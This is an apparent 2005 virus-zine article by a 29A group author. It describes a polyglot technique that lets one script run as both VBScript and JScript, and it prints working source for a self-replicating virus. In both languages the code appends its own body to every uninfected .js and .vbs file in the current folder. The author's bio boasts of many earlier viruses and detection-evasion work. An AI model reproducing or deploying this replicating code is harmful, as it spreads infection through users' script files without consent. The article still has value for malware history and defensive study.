Cross-scripting attacks
                               roy g biv / 29A


Former  DOS/Win16  virus writer, author of several virus  families,  including
Ginger  (see Coderz #1 zine for terrible buggy example, contact me for  better
sources  ;),  and Virus Bulletin 9/95 for a description of what   they  called
Rainbow.   Co-author  of  world's first virus using circular  partition  trick
(Orsam, coded with Prototype in 1993).  Designer of world's first XMS swapping
virus  (John Galt, coded by RT Fishel in 1995, only 30 bytes stub, the rest is
swapped  out).   Author of world's first virus using Thread Local Storage  for
replication  (Shrug, see Virus Bulletin 6/02 for a description, but they  call
it Chiton), world's first virus using Visual Basic 5/6 language extensions for
replication  (OU812), world's first Native executable virus (Chthon),  world's
first  virus  using process co-operation to prevent termination  (Gemini,  see
Virus  Bulletin 9/02 for a description), world's first virus using polymorphic
SMTP  headers (JunkMail, see Virus Bulletin 11/02 for a description),  world's
first viruses that can convert any data files to infectable objects (Pretext),
world's  first  32/64-bit  parasitic  EPO .NET  virus  (Croissant,  see  Virus
Bulletin  11/04  for a description, but they call it Impanate), world's  first
virus  using  self-executing HTML (JunkHTMaiL, see Virus Bulletin 7/03  for  a
description), world's first virus for Win64 on Intel Itanium (Shrug, see Virus
Bulletin 6/04 for a description, but they call it Rugrat), world's first virus
for  Win64 on AMD AMD64 (Shrug), world's first cross-infecting virus for Intel
IA32  and  AMD  AMD64 (Shrug), and world's first viruses  that  infect  Office
applications  and  script  files using the same code  (Macaroni).   Author  of
various  retrovirus  articles (eg see Vlad #7 for the strings that  make  your
code  invisible to TBScan).  Went to sleep for a number of years.  This is  my
fourth  virus  for VBScript and JScript.  They are the world's  first  viruses
that can infect both VBS and JScript using the same code.


Question: VBScript or JScript?

I  often wondered if it would be possible to create a single script that could
run  on  both platforms, but until now I could not think of a way to  identify
the platform or to protect against compiling errors.  It happens that there is
an  easy way to do both of these things, and I found it.


Answer: both

The way that I found is so simple that I am surprised at myself that I did not
find  it  sooner.  First, we use the fact that VBScript will treat  the  "rem"
statement  as a comment and skip the rest of the line, but JScript will  treat
it  as  a variable reference.  Second, we use the fact that  JScript  supports
block comments bounded by /* and */ and will ignore everything between them.

That's it.  So VBScript starts with a "rem" comment, then becomes JScript code
that  begins by assigning a value to a variable called "rem", then the rest of
the  line is the rest of the JScript code.  The line ends with the start of  a
block  comment.   The  next  line becomes the VBScript code  which  ends  with
another  rem  comment,  which returns to JScript code, which  ends  the  block
comment.   Let's  see the code.  The JScript must be a single line  after  the
"rem=1;" but is reformatted here.


rem=1;
/*ACDC - roy g biv 25/02/05*/
a=new ActiveXObject("scripting.filesystemobject")
b=a.opentextfile(WScript.scriptfullname).readall()
b=b.substr(b.search(c=/rem=1/))                 //remove everything before our code
b=b.substr(0,b.lastIndexOf("*/")+2)             //remove everything after our code
for(d=new Enumerator(a.getfolder(".").files);!d.atEnd();d.moveNext())
                                                //demo version, current directory only
{
  f=a.getextensionname(e=d.item()).toLowerCase()
  if(f=="js"||f=="vbs")try
  {
    f=a.getfile(e)
    g=a.attributes
    f.attributes=0
    if(a.opentextfile(e).readall().search(c)<0)a.opentextfile(e,8).write("\n"+b)
                                                //append ourselves if not infected already
    f.attributes=g
  }
  catch(z)
  {
  }
}
/*


Next is VBScript code, which can be also single line if reformatted.


on error resume next
set a=createobject("scripting.filesystemobject")
b=a.opentextfile(wscript.scriptfullname).readall
c="rem=1"
b=mid(b,instr(b,c))                             'remove everything before our code
b=left(b,instrrev(b,"*"+"/")+1)                 'remove everything after our code
set d=a.getfolder(".")                          'demo version, current directory only
for each e in d.files
  f=lcase(a.getextensionname(e))
  if f="js"or f="vbs"then
    f=a.attributes
    a.attributes=0
    if instr(a.opentextfile(e).readall,c)=0then a.opentextfile(e,8).write vbcrlf+b
                                                'append ourselves if not infected already
    a.attributes=f
  end if
next
rem*/


Greets to friendly people (A-Z):

Active - Benny - Obleak - Prototype - Ratter - Ronin - RT Fishel -
sars - The Gingerbread Man - Ultras - uNdErX - Vecna - VirusBuster -
Whitehead


rgb/29A feb 2005
iam_rgb@hotmail.com